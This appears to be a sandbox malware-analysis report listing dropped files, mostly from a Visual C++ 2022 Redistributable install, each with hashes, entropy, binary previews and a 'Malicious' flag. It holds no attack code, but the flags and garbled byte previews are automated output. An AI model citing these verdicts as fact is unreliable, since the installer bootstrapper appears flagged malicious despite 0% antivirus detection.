                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                Entropy (8bit):2.7049988900858613
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:KilQZgn0Ylwvl9YCAY9W9/HM/YEZFJtii2BkeMrwhQaPoaIhXM1Q9cIWF3:flQG29AefXXaQaIhXMq9bWF3
                                                                                                                                                                                                                                MD5:5DACF94CB1C3DD77F5ECB87C8A49D0B2
                                                                                                                                                                                                                                SHA1:D11661BA1D499F40408CD177ADD38CBC40CCDDB8
                                                                                                                                                                                                                                SHA-256:6DE44479EA917A7B33837020AA05EEBD3EBF1F237DCAE62540AABE853D9CB4A8
                                                                                                                                                                                                                                SHA-512:56871181972FA6D77CAF197740BC360E2EF8C379C2BA3A2EF67F4FEDFB71AA85868B1DDFD1CE9AB4114E14E7F1A84330F156D9F67C23946CF26C01D2E38E2FE3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.7.0.6.2.1.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .4.6.3.8.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, 5636301 bytes, 14 files
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5646501
                                                                                                                                                                                                                                Entropy (8bit):7.997675176540837
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:oqKsVnj1K/gzw98GRxtxmE8TDpd1LBEQxijqHvIjCchaewmQFK8PLdig+xwmz:oqKsVj1Mgzwz3h8JTBLi+PIjCchaTrjO
                                                                                                                                                                                                                                MD5:BE501F118803C6B283E5743CB94D4F44
                                                                                                                                                                                                                                SHA1:A9530C227FB73F98D137E6C178F48C4FCB78A1DA
                                                                                                                                                                                                                                SHA-256:008CA0B47D627692050C2B7FD16BC670C2EA2A7541ED4CAD9ABD1675A481B6C5
                                                                                                                                                                                                                                SHA-512:DDB3F7913F45E9D9C757CBC7B75B7A65C3EB9BF429C97AD73E9B321849427617EA4A1FDC15CA5166A5417345552046C6BA043A8D14FF4FC61D58A1F38F288356
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:MSCF......V.....D.............................V..'..............o.....U........T.. .mfc140.dll.......U....T.. .mfc140chs.dll.....@MV....T.. .mfc140cht.dll.......V....T.. .mfc140deu.dll.......W....T.. .mfc140enu.dll.......X....T.. .mfc140esn.dll.......Y....T.. .mfc140fra.dll.....P.[....T.. .mfc140ita.dll.......\....T.. .mfc140jpn.dll.......\....T.. .mfc140kor.dll.....8.]....T.. .mfc140rus.dll..3V..^....T.. .mfc140u.dll..Q..h......T.. .mfcm140.dll..Q.........T.. .mfcm140u.dll...w=.7..CK.:kxSU.;m..6....B. .)Xm.BQ....-Z^. XP..Q ..JiI;..3>.....`...+./(W.}.m..P.%...'.`.R.3w..srr.t.....|....^{...k.d..^e.....|..d.ca....a,i.$.i..w.....]0w.Rc.E/....X8k..E...s.K....-4.|.`..9....M~.....h.Y.6..mS2...Q.)..u.l.....M..u...>qS..M..-.|.M:..7..Q.i.E.....o....I.?5.p..+.?.....c.....<.........R.c..h..L..D..Q......H..d2..m...3.."y...c.}..}.1SZ...$?.f.a..h..A....GCQ..fZ.......!.pf....c.~.ysF..j..;.8`...'....126s........I.U.x%CE..d...Xr6lV.....,.....^..IG...h....< dL.....%...[.tI!<.
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, 894114 bytes, 11 files
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):904290
                                                                                                                                                                                                                                Entropy (8bit):7.996452097103788
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:24576:86eCAvQ5btGcXuMzZi8fgLLk1e3lJApUKUSwg:86eCjtGcDdi8+gkYag
                                                                                                                                                                                                                                MD5:C1F40B16E6DFD6C841C1F97524AC53F6
                                                                                                                                                                                                                                SHA1:7EAF1A916AC8498253A310EF30D6E2198F2C0555
                                                                                                                                                                                                                                SHA-256:A05B0138D3C22AF4593FEB5B4A3A55F92E4D958246BC4A87754EEE73E5E52600
                                                                                                                                                                                                                                SHA-512:B5ABA56C88D9375157954996CAE73E1D55FAAF956181A2EF8C1F62612DA91356454AD367AE5A5EB370D5C96CC27BF2B7D359F874A191C8913CFC3723B166EE6E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:MSCF............D................................'..............E..............T.. .concrt140.dll............T.. .msvcp140.dll..c..8......T.. .msvcp140_1.dll............T.. .msvcp140_2.dll............T.. .msvcp140_atomic_wait.dll..S.. ......T.. .msvcp140_codecvt_ids.dll..).........T.. .vcamp140.dll.....8+.....T.. .vccorlib140.dll......F.....T.. .vcomp140.dll.....x. ....T.. .vcruntime140.dll.....(.!....T.. .vcruntime140_1.dll....{B3..CK.[{\T..30:.:C.Nuo....H.P....@P>.G.z._..CQ.K.8.'..e.U.V..Fe7....<|"..$5=....E2..93g..........z|..k...:...H.!$.~.NB6..c!.......dS.}.7kR....5k.9;g..i/.3..=.j~v.9'w.y.lsB....s....GH.,.a.O>3......d....k....wm$....jv.......I..9.a.O.Tv.........2.Pn[&.'.2}q..N.8[..D.2..i&..........N..;x....!..#'.f.l.T.~.U....5?-..".S....`R.7... ...`.x....{.x0....Hv.....D,j....(.m....yV8N>!..{.....3}.u.!.S5L&y...Z.:...`N........`o:..lN.l.[I4...}.....D.o..u..f<?...G.+.......u$..?.P{.$..A.d/.P.R.tz..P.n#...vE..u...'x.9.P=r ...~g.m..W...0MO.XBmO...j..K.
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Additional Runtime - 14.32.31332., Template: x64;1033, Revision Number: {CCEC62E2-D343-4D90-AA20-D444B3BCF41F}, Create Time/Date: Fri Jun 10 21:15:48 2022, Last Saved Time/Date: Fri Jun 10 21:15:48 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):184320
                                                                                                                                                                                                                                Entropy (8bit):6.402742717359017
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:IviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdloc:IvipBaTDo1j//SZhlp
                                                                                                                                                                                                                                MD5:049E4621DBD5337AE926E067B6B442B5
                                                                                                                                                                                                                                SHA1:6DAE8D1D8106021C21B47B06765849E93F8E3359
                                                                                                                                                                                                                                SHA-256:F76E2807B845C49E15D8A41E3191716EAC9931467BFDD8366B60900B1FEF4235
                                                                                                                                                                                                                                SHA-512:46788A3C050508AC0868D8FC312A62724AE44D9F04F456075413D5A364B7152FAAB1027659435E39163952BB216B629AE77AB2F6A6B4318E8A8BB33F7D6413D3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.32.31332., Template: x64;1033, Revision Number: {20ED3096-9E22-4E8E-9324-164DCB895C9A}, Create Time/Date: Fri Jun 10 21:12:10 2022, Last Saved Time/Date: Fri Jun 10 21:12:10 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):184320
                                                                                                                                                                                                                                Entropy (8bit):6.394809317616259
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:YviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdEn:YvipBaTDo1j//SZh
                                                                                                                                                                                                                                MD5:61F974CF8F47F9A47760C3FB21A2CE3F
                                                                                                                                                                                                                                SHA1:16BA7BD668619F8E284BD7CBCE08FAD3CE97FCB9
                                                                                                                                                                                                                                SHA-256:78F2A39485D7B48733BC4767619BAA34310CF8F9DEDC120D054D0842EB4201EA
                                                                                                                                                                                                                                SHA-512:152A520FB24857AB0A834F1C94E0F7A21C1B998C71861843E37D55A2364A6730FAE2F3A02507941FF593A9C1C9F57018D9912BD0D80AB0B87D7B4158194B927C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, 894114 bytes, 11 files
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):904290
                                                                                                                                                                                                                                Entropy (8bit):7.996452097103788
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:24576:86eCAvQ5btGcXuMzZi8fgLLk1e3lJApUKUSwg:86eCjtGcDdi8+gkYag
                                                                                                                                                                                                                                MD5:C1F40B16E6DFD6C841C1F97524AC53F6
                                                                                                                                                                                                                                SHA1:7EAF1A916AC8498253A310EF30D6E2198F2C0555
                                                                                                                                                                                                                                SHA-256:A05B0138D3C22AF4593FEB5B4A3A55F92E4D958246BC4A87754EEE73E5E52600
                                                                                                                                                                                                                                SHA-512:B5ABA56C88D9375157954996CAE73E1D55FAAF956181A2EF8C1F62612DA91356454AD367AE5A5EB370D5C96CC27BF2B7D359F874A191C8913CFC3723B166EE6E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:MSCF............D................................'..............E..............T.. .concrt140.dll............T.. .msvcp140.dll..c..8......T.. .msvcp140_1.dll............T.. .msvcp140_2.dll............T.. .msvcp140_atomic_wait.dll..S.. ......T.. .msvcp140_codecvt_ids.dll..).........T.. .vcamp140.dll.....8+.....T.. .vccorlib140.dll......F.....T.. .vcomp140.dll.....x. ....T.. .vcruntime140.dll.....(.!....T.. .vcruntime140_1.dll....{B3..CK.[{\T..30:.:C.Nuo....H.P....@P>.G.z._..CQ.K.8.'..e.U.V..Fe7....<|"..$5=....E2..93g..........z|..k...:...H.!$.~.NB6..c!.......dS.}.7kR....5k.9;g..i/.3..=.j~v.9'w.y.lsB....s....GH.,.a.O>3......d....k....wm$....jv.......I..9.a.O.Tv.........2.Pn[&.'.2}q..N.8[..D.2..i&..........N..;x....!..#'.f.l.T.~.U....5?-..".S....`R.7... ...`.x....{.x0....Hv.....D,j....(.m....yV8N>!..{.....3}.u.!.S5L&y...Z.:...`N........`o:..lN.l.[I4...}.....D.o..u..f<?...G.+.......u$..?.P{.$..A.d/.P.R.tz..P.n#...vE..u...'x.9.P=r ...~g.m..W...0MO.XBmO...j..K.
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Minimum Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.32.31332., Template: x64;1033, Revision Number: {20ED3096-9E22-4E8E-9324-164DCB895C9A}, Create Time/Date: Fri Jun 10 21:12:10 2022, Last Saved Time/Date: Fri Jun 10 21:12:10 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):184320
                                                                                                                                                                                                                                Entropy (8bit):6.394809317616259
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:YviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdEn:YvipBaTDo1j//SZh
                                                                                                                                                                                                                                MD5:61F974CF8F47F9A47760C3FB21A2CE3F
                                                                                                                                                                                                                                SHA1:16BA7BD668619F8E284BD7CBCE08FAD3CE97FCB9
                                                                                                                                                                                                                                SHA-256:78F2A39485D7B48733BC4767619BAA34310CF8F9DEDC120D054D0842EB4201EA
                                                                                                                                                                                                                                SHA-512:152A520FB24857AB0A834F1C94E0F7A21C1B998C71861843E37D55A2364A6730FAE2F3A02507941FF593A9C1C9F57018D9912BD0D80AB0B87D7B4158194B927C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):650568
                                                                                                                                                                                                                                Entropy (8bit):7.2230397573160205
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:vnMwHskY7gjcjhVIEhqgM7bWvcsi6aV4TIyn8EU40vy3W/ceKSHMsiFyY6XN2/Z:/MysZgjS1hqgSC/izcfn8fjymk4HM5y0
                                                                                                                                                                                                                                MD5:D940EA062ED6E99F6D873C2F5F09D1C9
                                                                                                                                                                                                                                SHA1:6ABEC3341D3BCA045542C7B812947B55DDAF6B64
                                                                                                                                                                                                                                SHA-256:A0FCE2B6C865AE4F00145C9B366C39484DAF3160B526C77005E59F6F65ADB202
                                                                                                                                                                                                                                SHA-512:E4069E41311E8BD4599DE0A1BDF0EE0B76316359A0C83AC663C23DA8833E5DC0EFFA260FE8D0E47F4BEFA94C87FC7BF93BCE2B79792ABE8BEFC59ACF5401CFE1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p......Y~....@..............................................;..........0....(...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):968
                                                                                                                                                                                                                                Entropy (8bit):2.6676277866784046
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:oZK34pgMClGttDa+xU9TABflutzttun2QpQ1qOqT6un2QUQ1qOW:aKUgMClccTABfluvZqxZ
                                                                                                                                                                                                                                MD5:21596E3286D943CA0736D60733BB16F9
                                                                                                                                                                                                                                SHA1:32FB0B2365E1DD9C9E0D730048E370917D271432
                                                                                                                                                                                                                                SHA-256:56B384B4E4D6B3CBA46FFEC5AD7FE49F5C0B6DFB2EF5F628F5B6CB734F0E0A7E
                                                                                                                                                                                                                                SHA-512:D71C3CDD57CB451371826D5FAE42A0469B651ED8A2066590DE21974824F952FC541C6EFF42F8805428BEC09FDD644961DFD289921EDF0A2CD73FBD83096E458A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:K...................................................................................................................................................................................................................................................W.i.x.B.u.n.d.l.e.F.o.r.c.e.d.R.e.s.t.a.r.t.P.a.c.k.a.g.e.....................W.i.x.B.u.n.d.l.e.L.a.s.t.U.s.e.d.S.o.u.r.c.e.................................W.i.x.B.u.n.d.l.e.N.a.m.e.....B...M.i.c.r.o.s.o.f.t. .V.i.s.u.a.l. .C.+.+. .2.0.1.5.-.2.0.2.2. .R.e.d.i.s.t.r.i.b.u.t.a.b.l.e. .(.x.6.4.). .-. .1.4...3.2...3.1.3.3.2.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.....A...C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.i.s.-.A.3.Q.0.E...t.m.p.\.v.c._.r.e.d.i.s.t...x.6.4...e.x.e.............W.i.x.B.u.n.d.l.e.O.r.i.g.i.n.a.l.S.o.u.r.c.e.F.o.l.d.e.r.....0...C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.i.s.-.A.3.Q.0.E...t.m.p.\.................................
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                File Type:Microsoft Cabinet archive data, 5636301 bytes, 14 files
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5646501
                                                                                                                                                                                                                                Entropy (8bit):7.997675176540837
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:98304:oqKsVnj1K/gzw98GRxtxmE8TDpd1LBEQxijqHvIjCchaewmQFK8PLdig+xwmz:oqKsVj1Mgzwz3h8JTBLi+PIjCchaTrjO
                                                                                                                                                                                                                                MD5:BE501F118803C6B283E5743CB94D4F44
                                                                                                                                                                                                                                SHA1:A9530C227FB73F98D137E6C178F48C4FCB78A1DA
                                                                                                                                                                                                                                SHA-256:008CA0B47D627692050C2B7FD16BC670C2EA2A7541ED4CAD9ABD1675A481B6C5
                                                                                                                                                                                                                                SHA-512:DDB3F7913F45E9D9C757CBC7B75B7A65C3EB9BF429C97AD73E9B321849427617EA4A1FDC15CA5166A5417345552046C6BA043A8D14FF4FC61D58A1F38F288356
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:MSCF......V.....D.............................V..'..............o.....U........T.. .mfc140.dll.......U....T.. .mfc140chs.dll.....@MV....T.. .mfc140cht.dll.......V....T.. .mfc140deu.dll.......W....T.. .mfc140enu.dll.......X....T.. .mfc140esn.dll.......Y....T.. .mfc140fra.dll.....P.[....T.. .mfc140ita.dll.......\....T.. .mfc140jpn.dll.......\....T.. .mfc140kor.dll.....8.]....T.. .mfc140rus.dll..3V..^....T.. .mfc140u.dll..Q..h......T.. .mfcm140.dll..Q.........T.. .mfcm140u.dll...w=.7..CK.:kxSU.;m..6....B. .)Xm.BQ....-Z^. XP..Q ..JiI;..3>.....`...+./(W.}.m..P.%...'.`.R.3w..srr.t.....|....^{...k.d..^e.....|..d.ca....a,i.$.i..w.....]0w.Rc.E/....X8k..E...s.K....-4.|.`..9....M~.....h.Y.6..mS2...Q.)..u.l.....M..u...>qS..M..-.|.M:..7..Q.i.E.....o....I.?5.p..+.?.....c.....<.........R.c..h..L..D..Q......H..d2..m...3.."y...c.}..}.1SZ...$?.f.a..h..A....GCQ..fZ.......!.pf....c.~.ysF..j..;.8`...'....126s........I.U.x%CE..d...Xr6lV.....,.....^..IG...h....< dL.....%...[.tI!<.
                                                                                                                                                                                                                                Process:C:\Windows\Temp\{07D0B832-8F40-4A09-81B7-C92B248852DA}\.be\VC_redist.x64.exe
                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2022 X64 Additional Runtime, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2022 X64 Additional Runtime - 14.32.31332., Template: x64;1033, Revision Number: {CCEC62E2-D343-4D90-AA20-D444B3BCF41F}, Create Time/Date: Fri Jun 10 21:15:48 2022, Last Saved Time/Date: Fri Jun 10 21:15:48 2022, Number of Pages: 301, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.10.4.4718), Security: 2
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):184320
                                                                                                                                                                                                                                Entropy (8bit):6.402742717359017
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:IviOApBgbxkK3zoGCK4Kr1kNM+BxWy2bDZRJdloc:IvipBaTDo1j//SZhlp
                                                                                                                                                                                                                                MD5:049E4621DBD5337AE926E067B6B442B5
                                                                                                                                                                                                                                SHA1:6DAE8D1D8106021C21B47B06765849E93F8E3359
                                                                                                                                                                                                                                SHA-256:F76E2807B845C49E15D8A41E3191716EAC9931467BFDD8366B60900B1FEF4235
                                                                                                                                                                                                                                SHA-512:46788A3C050508AC0868D8FC312A62724AE44D9F04F456075413D5A364B7152FAAB1027659435E39163952BB216B629AE77AB2F6A6B4318E8A8BB33F7D6413D3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3036000
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                Entropy (8bit):2.9216957692876595
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:ST8XNcKu0iTwbAziYN570RMZXVuKnQM2V6ofbDO4xmTgZcZygSA2O9RVHfwrhhxV:JNcgiD5Q6luKQM2V7DXcAgSA2KD4jL
                                                                                                                                                                                                                                MD5:1A706D20E96086886B5D00D9698E09DF
                                                                                                                                                                                                                                SHA1:DACF81D90647457585345BEDD6DE222E83FDE01F
                                                                                                                                                                                                                                SHA-256:759F62B61AA65D6D5FAC95086B26D1D053CE1FB24A8A0537ACB42DDF45D2F19F
                                                                                                                                                                                                                                SHA-512:CFF7D42AA3B089759C5ACE934A098009D1A58111FE7D99AC7669B7F0A1C973907FD16A4DC1F37B5BE5252EC51B8D876511F4F6317583FA9CC48897B1B913C7F3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ...$...................................................................$..S`.........g.....[.[.[................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3036000
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):45056
                                                                                                                                                                                                                                Entropy (8bit):0.7853305971874845
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
                                                                                                                                                                                                                                MD5:00C036C61F625BF9D25362B9BE24ADEB
                                                                                                                                                                                                                                SHA1:6738C3D037E4A2E9F41B1398BA88E5771532F593
                                                                                                                                                                                                                                SHA-256:0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
                                                                                                                                                                                                                                SHA-512:711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                Entropy (8bit):2.3172897780113213
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:oNwCz2C+NR73QOaq9kozeav2RT3VnnnekEEN9ORelnasL:ouZC+NJLaqe0LUTpnn1DN9OROnj
                                                                                                                                                                                                                                MD5:D5ECE7413F423743B368D55921D78C0A
                                                                                                                                                                                                                                SHA1:3F1E854E373FB2F9BFD868AF38AF5C6B3CD2A71D
                                                                                                                                                                                                                                SHA-256:D38D8A693CD4B718EA9E4995939262749893878EE9A0931BEB0F33781979FD77
                                                                                                                                                                                                                                SHA-512:F54CAB99D2795DF2D01E54D1E1184D116A56E8053140BAF868ADBFC7EE35EFBC59F83E3FF26C84E0D6D1A118BB79CAB82527F1502D328483953A0A58BEED8E0B
                                                                                                                                                                                                                                Malicious:false
